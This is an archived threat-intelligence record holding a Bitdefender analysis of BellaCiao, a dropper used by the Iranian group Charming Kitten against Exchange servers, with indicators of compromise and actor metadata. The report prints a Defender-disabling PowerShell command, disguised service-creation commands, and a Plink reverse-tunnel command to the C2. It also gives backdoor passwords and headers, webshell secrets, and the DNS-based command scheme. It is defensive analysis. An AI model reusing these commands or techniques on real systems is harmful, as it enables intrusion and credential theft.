{ "id": "77f9652c-65cc-46c5-9349-ae5ca1a2d238", "created_at": "2026-04-06T00:18:10.239296Z", "updated_at": "2026-04-10T03:34:00.669156Z", "deleted_at": null, "sha1_hash": "02cd613c4ee1799679e2ea94cac240aa94d85dfc", "title": "Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 415123, "plain_text": "Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware\r\nBy Martin Zugec\r\nArchived: 2026-04-05 14:18:11 UTC\r\nWith recent reports that Charming Kitten group (aka Mint Sandstorm) is actively targeting critical infrastructure in the US\r\nand other countries, we would like to share the most recent insights from Bitdefender Labs about modernization of\r\nCharming Kitten’s tactics, techniques, and procedures, including a new, previously unseen malware. This malware is\r\ntailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach\r\nwith its command-and-control (C2) infrastructure. \r\nThe name used by malware developers is BellaCiao, a reference to the Italian folk song about resistance fighting. We have\r\nidentified multiple victims in the United States and Europe, but also in the Middle East (Turkey) or India. \r\nWho is Charming Kitten?\r\nCharming Kitten (also known as APT35/Mint Sandstorm/PHOSPHORUS) is an Iranian state-sponsored APT group\r\nassociated with the Islamic Revolutionary Guard Corps (IRGC).  \r\nCharming Kitten has been on the radar of the infosec community since 2014, and was infamous for targeting political\r\ndissidents, activists, journalists, and individuals protesting oppressive regimes. While this group mostly relied on social\r\nengineering and spear phishing to achieve its goals, it was known for using sophisticated methods, including impersonation\r\nof well-known researchers or activists. \r\nThe modernization of Iran’s arsenal\r\nIn a speech on 17 March 2021, Ebrahim Raisi (then chief justice of Iran) declared: “The Islamic Revolutionary Guard Corps\r\nhas excelled in every field it has entered both internationally and domestically, including security, defense, service provision\r\nand construction.” In August 2021, Raisi replaced more moderate candidate Hassan Rouhani as the president of Iran.\r\nStarting only one month after his inauguration, cyberattacks attributed to IRGC threat actors started increasing in scope,\r\nscale, and sophistication. \r\nAfter a transition of power in 2021, the IRGC and associated APT groups adopted a more aggressive and confrontational\r\napproach and demonstrated a willingness to use force to achieve its objectives.  During this transitional period, Charming\r\nKitten (and other associated groups) became more proficient in quickly weaponizing publicly disclosed PoCs. Although they\r\nrequired several weeks to weaponize Log4Shell in 2022, the initial attempts to exploit CVE-2022-47966 in Zoho\r\nManageEngine were identified on the same day the PoC was made public. \r\nQuick weaponization of publicly disclosed PoCs is the “new” winning formula for both financially motivated and state-sponsored threat actors: \r\n1. Threat actors identify an remote code execution (RCE) vulnerability (preferably with a public PoC example) that\r\nimpacts as many companies as possible. Examples are Apache, Microsoft Exchange, VMware ESXi or the most\r\nrecent vulnerability in MSMQ. Due to the sheer scale of global deployments, even if most companies patch\r\nimmediately, tens of thousands of vulnerable servers are available even years after patch is released.  \r\n2. Using automated scanners, vulnerable systems are discovered and automatically compromised (spray-and-pray\r\ntactic).\r\n3. Malicious payload (typically a webshell to enable remote administration access) is deployed on compromised server. \r\n4. Initial (opportunistic and fully automated) compromise is followed by a manual triage phase to determine the best\r\napproach to benefit from an attack.\r\nhttps://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/\r\nPage 1 of 6\n\nFig 1 – An example flow of hybrid attack  \r\nBoth financially motivated and state-sponsored groups continue innovating and improving this approach. In our survey, 80%\r\nof the USA respondents (54% global) identified software vulnerabilities in 2023 as their primary concern, jumping ahead of\r\nboth ransomware and phishing attacks. \r\nOne crucial aspect of this emerging attack method is that there can be a significant time gap between the automated and\r\nmanual phases. For instance, when initial access brokers are involved, a compromised server with a webshell may remain\r\ndormant until an interested buyer is found, and the transaction is completed. Alternatively, threat actors may compromise\r\nmore servers than they can handle, creating a backlog of compromised networks. \r\nThreat actors with lower levels of sophistication can exploit the absence of advanced detection capabilities like EDR, XDR,\r\nor MDR on compromised networks, making this tactic highly effective until such tools become more widely adopted. More\r\nsophisticated threat actors, including Charming Kitten, are trying to stay ahead of defenders by using custom tools to evade\r\ndetection. Custom-developed malware, also known as “tailored” malware, is generally harder to detect because it is\r\nspecifically crafted to evade detection and contains unique code.  \r\nMicrosoft recently documented two custom implants from Charming Kitten named Drokbk and Soldier, and Google\r\npreviously discovered a custom data extraction tool called HYPERSCRAPE. In the next section, we are going to analyze a\r\nnew implant called BellaCiao, discovered by security researchers from Bitdefender Labs. \r\nBellaCiao – Truly personalized dropper\r\nDuring our investigation, we have located multiple BellaCiao samples. Each sample collected was tied up to a specific\r\nvictim and included hardcoded information such as company name, specially crafted subdomains, or associated public IP\r\naddress. Because all binaries are highly customized and can reveal information about victims, we are not including\r\ninformation such as MD5 or SHA256 hashes in this report. \r\nAll samples that we collected included .pdb paths. PDB (Program DataBase) is a file format used by Microsoft Visual\r\nStudio for storing debugging information about an executable or DLL file. We used it to extract build information of project,\r\nincluding the project name and path that was configured in Visual Studio. \r\nZ:\\BellaCiao\\BellaCiao\\More Targets\\\u003cCountry\u003e\\\u003cPublic IP\u003e\\\r\n\u003cHostname\u003e\\backdoor\\MicrosoftAgentServices\\MicrosoftAgentServices\\obj\\Release\\\r\nUsing information from these files, we can learn that victims were organized in different folders by country, using folder\r\nnames like IL(Israel) , TR(Turkey) , AT(Austria) , IN(India) or IT(Italy) . The original developer named this\r\nproject BellaCiao, a reference to an Italian folk song that is an anthem of resistance and freedom. It is possible that the use\r\nof the name \"BellaCiao\" by Iranian hackers can be a symbolic reference to their perceived struggle against the world, but\r\nthis is speculative and there is no concrete evidence to support this theory. Ultimately, the true reasons behind the choice of\r\nthis name may only be known to the individuals or group responsible for the malware. Information about \u003cPublic IP\u003e and\r\n\u003cHostname\u003e are relevant for communication with C2 infrastructure, we will describe this process later. \r\nInitial infection\r\nThe exact initial infection vector is unknown, but we expect Microsoft Exchange exploit chain (like\r\nProxyShell/ProxyNotShell/OWASSRF) or similar software vulnerability. Primary target was Microsoft Exchange servers. \r\nUpon deployment, BellaCiao immediately attempts to disable Microsoft Defender using the following PowerShell\r\ncommand: \r\npowershell.exe -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true\r\nPersistence\r\nA new service instance is created to establish persistence. Legitimate process names specific to Microsoft Exchange server\r\nwere used to blend in, a common technique known as masquerading. \r\nsc create \"Microsoft Exchange Services Health\" binpath= \"C:\\\\ProgramData\\\\Microsoft\\\\DRMS\\\\Microsoft\r\nExchange Services Health.exe\" start= auto\r\nsc start \"Microsoft Exchange Services Health\"\r\nsc create \"Exchange Agent Diagnostic Services\" binpath=\r\n\"C:\\\\ProgramData\\\\Microsoft\\\\Diagnostic\\\\Exchange Agent Diagnostic Services.exe\" start= auto\r\nsc start \"Microsoft Exchange Services Health\"\r\nhttps://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/\r\nPage 2 of 6\n\nThreat actors also attempted to download two IIS backdoors from http://188.165.174[.]199:18080 .\r\nThe first one was a build of IIS-Raid, a native IIS module (MD5: 5a487c41efa2f3055d641591d601977c ) downloaded\r\nfrom http://188.165.174[.]199:18080/index.aspx . This module processes every IIS request, looking for pre-defined headers with password and command to execute. In case the required header is not present (or passwords\r\ndon’t match), the request will be processed by IIS without giving any indication of the backdoor. The header X-Beserver-Verify is used for password, while the header X-Forward-Verify includes the command to execute. The\r\nexpected password is P@ss.XxYyTtGg@123! .  \r\nThe second backdoor was a .NET IIS module for credential exfiltration (MD5:\r\n95c6fdc4f537bccca3079d94e65bc0b0 ) downloaded from http://188.165.174[.]199:18080/favico.ico . This\r\nmodule is similar to the first one, with headers X-Verify-Request (password, expected value 01odm$kfnPAnjf) and\r\nX-Beserver-Pd (command to execute). Additionally, it is looking for HTTP requests that include keywords\r\n“ pass ”, “ pwd ”, “ password ”, or “ login ”. Any HTTP request that contains one of these words is appended to\r\nthe file %LocalAppData%\\193d910f01-0293e1a6-591d103f.dat , ready for credential exfiltration. \r\nExecution\r\nThe BellaCiao executable is written to one of the following locations: \r\nC:\\ProgramData\\Microsoft\\DRMS\\Microsoft Exchange Services Health.exe\r\nC:\\ProgramData\\Microsoft\\Diagnostic\\Exchange Agent Diagnostic Services.exe\r\nC:\\Users\\Public\\Microsoft\\Diagnostic\\Microsoft Services Diagnostics Logs.exe\r\nThese executables run as a service (e.g. “Microsoft Exchange Services Health”). The BellaCiao is a dropper malware – it is\r\ndesigned to deliver other malware payloads onto a victim’s computer system, based on instructions from C2 server. The\r\npayload delivered by BellaCiao is not downloaded but hardcoded into the executable as malformed base64 strings and\r\ndumped when requested. \r\nTo receive instructions from C2 server, BellaCiao is using unique approach of domain name resolution and parsing of the\r\nreturned IP address.  \r\nA DNS request is performed every 24 hours to resolve a subdomain (hardcoded string unique for each victim) using the\r\nfollowing pattern: \r\n\u003c2 random uppercase letters\u003e\u003c3 random lowercase letters\u003e\u003cvictim specific subdomain\u003e.\u003cC2 domain\u003e\r\nThe executable code of BellaCiao compares a resolved IP address returned by a DNS server under the control of a threat\r\nactor with an IP address that has been hardcoded into the program. The resolved IP address is like the real public IP address,\r\nbut with slight modifications that allow BellaCiao to receive further instructions. It's important to note that BellaCiao only\r\noperates with two fixed values - a hardcoded IP string (“local” IP, we will use L1.L2.L3.L4 for examples) and the IP\r\naddress returned by the DNS server controlled by the threat actor (“remote” IP - R1.R2.R3.R4 ). The code does not contain\r\nthe actual IP address; rather, it mimics its format to give the impression that the DNS requests are valid. \r\nWhen comparing these two IP addresses, there are three potential scenarios, depending on the last octet of an IP address: \r\nL1.L2.L3.L4 == R1.R2.R3.(R4 - 1) – Remove all artefacts of webshell (dropped resources and running processes) \r\nL4 == R4 - Instructions to deploy webshell \r\nL4 != R4 – Do nothing \r\nAfter receiving instructions to deploy webshell (local IP equals resolved IP), other octets (segments of IP address) are parsed\r\nto identify the folder and filename to use. \r\nBelow is the list of octets and which aspect of webshell deployment they impact: \r\n1. R4 (as shown above) – the operation to perform (skip, drop, or disappear) \r\n2. R3 – the folder where to deploy webshell\r\n3. R2 – the subfolder, also depending on value of R3 \r\n4. R1 – the filename, also depending on value of R2\r\nhttps://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/\r\nPage 3 of 6\n\nIf we use a Google Public DNS server address (8.8.8.8) as an example, here are few deployment scenarios (depending on\r\nresolved IP address): \r\n8.8.8.8 - C:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\owafont.aspx\r\n8.8.7.8 - c:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\aspnet.aspx\r\n8.10.8.8 - C:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15 \\FrontEnd\\HttpProxy\\owa\\auth\\Current\\logont.aspx\r\n7.9.6.8 - c:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\system_web\\\u003crandom\u003e.aspx\r\nThe dropped .aspx webshell supports 3 operations: \r\nUpload \r\nDownload \r\nCommand execution \r\nThe User-Agent string must start with a secret code ( ruby@123! ) to make sure that the request is coming from threat actors,\r\nfollowed by requested operation. \r\nWe have also analyzed the second variant of BellaCiao that contains different payload. This second variant drops the Plink\r\ntool and PowerShell script hardcoded locations. The PowerShell scripts executes the Plink tool for establishing a reverse\r\nproxy connection to the C2 to enable interaction with the PowerShell web server: \r\n\u003cPlink\u003e \u003cC2 domain\u003e -P 443 -C -R 127.0.0.1:49700:127.0.0.1:49700 -l \u003cUser\u003e -pw \u003cPassword\u003e”;\r\nPowerShell web server implements the following operations: \r\nCommand execution  \r\nExecute script \r\nDownload file  \r\nUpload file  \r\nUpload web logs  \r\nReport web server start time  \r\nReport current time  \r\nBeep  \r\nStop web server\r\nConclusion\r\nThe best protection against modern attacks involves implementing a defense-in-depth architecture. This approach involves\r\nemploying multiple layers of security measures that are designed to protect against a variety of threats. The first step in this\r\nprocess is to reduce the attack surface, which involves limiting the number of entry points that attackers can use to gain\r\naccess to your systems and prompt patching of newly discovered vulnerabilities. \r\nhttps://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/\r\nPage 4 of 6\n\nIn addition to reducing the attack surface, it is important to implement automated protection controls that can detect and\r\nblock most security incidents before they can cause any harm. Implementing IP, domain, and URL reputation is one of the\r\nmost effective methods of defeating automated vulnerability exploits. According to analysis in the Data Breach\r\nInvestigations Report 2022, only 0.4% of the IPs that attempted Remote Code Execution were not seen in a previous attack.\r\nBlocking bad IPs, domains, or URLs on all devices, including remote and work-from-home endpoints, can be highly\r\neffective. \r\nDespite your best efforts, it is still possible that some security incidents will make it past your automated prevention\r\ncontrols. This is where security operations and incident response come into play. A well-equipped security operations center\r\n(SOC) can monitor your systems for signs of suspicious activity and respond quickly and effectively to any security\r\nincidents that do occur. This may involve using advanced threat hunting techniques, leveraging artificial intelligence and\r\nmachine learning algorithms, and coordinating with other stakeholders to minimize the impact of any security incidents.\r\nLean on security operations, either in-house or through a managed service, and leverage strong detection and response tools.\r\nModern threat actors often spend weeks or months doing active reconnaissance on networks, generating alerts, and relying\r\non the absence of detection and response capabilities. \r\nWe would like to thank Adrian Schipor, Victor Vrabie, Cristina Vatamanu, and Alexandru Maximciuc for help with putting\r\nthis advisory report together.  \r\nIndicators of compromise\r\nAn up-to-date and complete list of indicators of compromise is available to Bitdefender Advanced Threat Intelligence users.\r\nThe currently known indicators of compromise can be found in the table below. \r\nFiles\r\nFile Path  MD5  Details \r\nC:\\ProgramData\\Microsoft\\DRMS\\JavaUpdateServices.exe; \r\nC:\\ProgramData\\Microsoft\\Diagnostic\\MicrosoftExchangeDiagnosticServices.exe; \r\nC:\\ProgramData\\Microsoft\\Diagnostic\\MicrosoftExchangeServicesLog.exe; \r\n4812449f7fad62162ba8c4179d5d45d7 \r\nPlink tool is used for\r\naddress is provided b\r\nc:\\windows\\temp\\Certificates\\envisa.exe  3fbea74b92f41809f46145f480782ef9 \r\nThe Plink tool used f\r\nwmic /node:127.0.0\r\n\"c:\\\\windows\\\\temp\\\r\n127.0.0.1:40455:192\r\nc:\\windows\\temp\\Certificates\\envisa.ps1  - \r\nThe PowerShell scrip\r\nexecutes the c:\\win\r\nwith 88.80.148[.]1\r\nC:\\ProgramData\\Microsoft\\DRMS\\JavaUpdateServices.ps1 \r\nc450477ed9c347c4c3d7474e1f069f14 \r\nc6f394847eb3dc2587dc0c0130249337 \r\n7df50cb7d4620621c2246535dd3ef10c \r\ne7149c402a37719168fb739c62f25585 \r\n \r\nThe PowerShell scrip\r\nexecutes the C:\\Pro\r\ncommunicating with\r\nC:\\ProgramData\\Microsoft\\Diagnostic\\MicrosoftExchangeServicesLog.ps1 \r\n284cdf5d2b29369f0b35f3ceb363a3d1 \r\n \r\nThe PowerShell scrip\r\nexecutes the\r\nC:\\ProgramData\\Mic\r\ncommunicating with\r\nC:\\ProgramData\\Microsoft\\Diagnostic\\MicrosoftExchangeServicesLog.ps1  2daa29f965f661405e13b2a10d859b87 \r\nThe Powershell scrip\r\nexecutes the\r\nC:\\ProgramData\\M\r\nfor communicating w\r\nhttps://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/\r\nPage 5 of 6\n\nc:\\inetpub\\wwwroot\\aspnet_client\\system_web\\webclient.aspx; \r\nC:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\logon.aspx; \r\nC:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\themes.aspx; \r\nC:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\owafont.aspx \r\nf56a6da833289f821dd63f902a360c31  Web shell that implem\r\nNetwork\r\nDomain  Source \r\nmail-updateservice[.]info   Bitdefender research \r\nmsn-center[.]ukBitdefender research \r\nmsn-service[.]coBitdefender research \r\ntwittsupport[.]comBitdefender research \r\nmailupdate[.]infoBitdefender research \r\nmaill-support[.]comBitdefender research \r\nIP address  Source \r\n88.80.148[.]162   Bitdefender research \r\nCONTACT AN EXPERT\r\nSource: https://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/\r\nhttps://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/" ], "report_names": [ "unpacking-bellaciao-a-closer-look-at-irans-latest-malware" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7", "created_at": "2025-08-07T02:03:24.764883Z", "updated_at": "2026-04-10T02:00:03.611225Z", "deleted_at": null, "main_name": "COBALT MIRAGE", "aliases": [ "DEV-0270 ", "Nemesis Kitten ", "PHOSPHORUS ", "TunnelVision ", "UNC2448 " ], "source_name": "Secureworks:COBALT MIRAGE", "tools": [ "BitLocker", "Custom powershell scripts", "DiskCryptor", "Drokbk", "FRPC", "Fast Reverse Proxy (FRP)", "Impacket wmiexec", "Ngrok", "Plink", "PowerLessCLR", "TunnelFish" ], "source_id": "Secureworks", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434690, "ts_updated_at": 1775792040, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/02cd613c4ee1799679e2ea94cac240aa94d85dfc.pdf", "text": "https://archive.orkl.eu/02cd613c4ee1799679e2ea94cac240aa94d85dfc.txt", "img": "https://archive.orkl.eu/02cd613c4ee1799679e2ea94cac240aa94d85dfc.jpg" } }